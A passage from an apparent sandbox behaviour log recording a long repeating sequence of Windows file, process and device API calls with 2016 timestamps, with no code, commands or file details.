"timestamp": "2016-02-16 17:41:51,767", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,777", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,777", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,777", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,777", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,777", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,777", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,777", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,777", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,777", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,777", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,777", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,777", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,787", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,787", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,787", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,787", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,787", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,787", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,787", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,787", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,787", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,787", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,787", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,787", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,797", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,797", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,797", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,797", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,797", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,797", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,797", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,797", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,797", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,797", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,797", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,797", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,797", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,797", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,807", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,807", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,807", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,807", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,807", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,807", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,807", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,807", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,807", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,807", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,807", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,807", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,807", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,817", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,817", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,817", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,817", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,817", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,817", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,817", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,817", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,837", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,837", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,837", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,837", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,837", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,837", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,837", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,837", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,837", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,837", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,847", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,847", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,847", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,847", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,847", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,847", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,847", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,847", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,847", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,847", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,857", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,857", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,857", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,857", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,857", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,857", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,857", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,857", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,857", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,857", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,857", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,867", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,867", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,867", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,867", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,867", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,867", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,867", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,867", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,867", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,867", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,867", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,867", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,867", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,877", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,877", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,877", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,877", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,877", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,877", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,877", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,877", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,877", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,877", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,877", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,877", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,877", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,877", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,877", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,887", "api": "MoveFileWithProgressW"}, {"category": "device", "timestamp": "2016-02-16 17:41:51,887", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,887", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,887", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,887", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,887", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,887", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,887", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,887", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,887", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,887", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,887", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,887", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,897", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,897", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,897", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,897", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,897", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,897", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,897", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,897", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,897", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,897", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,897", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,897", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,897", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,907", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,907", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,907", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,907", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,907", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,907", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:51,907", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:51,907", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:51,907", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:51,907", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:51,907", "api": "DeviceIoControl"}, {"category": "device", "timestamp": "2016-02-16 17:41:51,907", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,907", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,907", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,907", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,907", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,907", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,907", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,907", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,917", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,917", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,917", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,917", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,917", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,917", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,917", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,917", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,917", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,917", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,917", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,927", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,927", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,927", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,927", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,927", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,927", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,927", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,927", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,927", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,927", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,927", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,927", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,927", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,927", "api": "NtFreeVirtualMemory"}, {"category": "device", "timestamp": "2016-02-16 17:41:51,927", "api": "DeviceIoControl"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,927", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,937", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,937", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,937", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,937", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,937", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,937", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,937", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,937", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,937", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,937", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,937", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,937", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,947", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,947", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,947", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,947", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,947", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,947", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,947", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,947", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,947", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,947", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,947", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,947", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,947", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,957", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,957", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,957", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,957", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,957", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,957", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,957", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,957", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,957", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,957", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,957", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,967", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,967", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,967", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,967", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,967", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,967", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,967", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,967", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,967", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,967", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,967", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,967", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,977", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,977", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,977", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,977", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,977", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,977", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,977", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,977", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,987", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,987", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,987", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,987", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,987", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,987", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,987", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,987", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,987", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,987", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,987", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,987", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,987", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,997", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,997", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,997", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,997", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,997", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:51,997", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,997", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,997", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,997", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,997", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,997", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,997", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:51,997", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,007", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,007", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,007", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,007", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,007", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,007", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,007", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,007", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,007", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,007", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,007", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,017", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,017", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,017", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,017", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,017", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,017", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,017", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,017", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,017", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,017", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,017", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,017", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,017", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,027", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,027", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,027", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,027", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,027", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,027", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,027", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,027", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,027", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,027", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,027", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,027", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,027", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,027", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,037", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,037", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,037", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,037", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,037", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,037", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,037", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,037", "api": "MoveFileWithProgressW"}, 